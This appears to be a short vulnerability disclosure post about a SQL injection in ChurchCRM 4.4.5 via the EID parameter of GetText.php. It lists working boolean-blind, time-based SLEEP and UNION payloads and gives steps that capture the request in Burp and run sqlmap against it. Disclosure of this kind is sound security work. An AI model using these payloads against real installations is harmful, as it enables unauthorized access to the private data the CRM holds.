ChurchCRM 4.4.5 — SQL Injection at GetText.php

2 min readJul 11, 2022

Vulnerability Explanation:

ChurchCRM 4.4.5 was discovered to contain a SQL injection vulnerability via the EID parameter at /churchcrm/GetText.php

Affected Component:



Parameter: EID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: EID=2 AND 5131=5131
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: EID=2 AND (SELECT 8794 FROM (SELECT(SLEEP(5)))vcYY)
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: EID=-8266 UNION ALL SELECT CONCAT(0x716a626a71,0x4f4247535a686a694a597a48694d4e6c76515974547872624f6b4d6642564f764752694c7461526b,0x7176767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

Tested on:

  1. ChurchCRM Version 4.4.5

Steps to attack:

  1. Login with an admin credential.

2. Go to the “Events” as shown in the picture and Click on the “List Church Events”

3. Click on Sermon Text.

4. We’ll found /churchcrm/GetText.php?EID=2.

5. Refresh pages again and intercept request with burp.

6.Create a text file with the content of the request.

7.Using sqlmap with our text file by the following the command below:

sqlmap -r GetText.req -p EID

8. We discovered SQL injection vulnerability via the EID parameter.




You get the best out of others when you give the best of yourself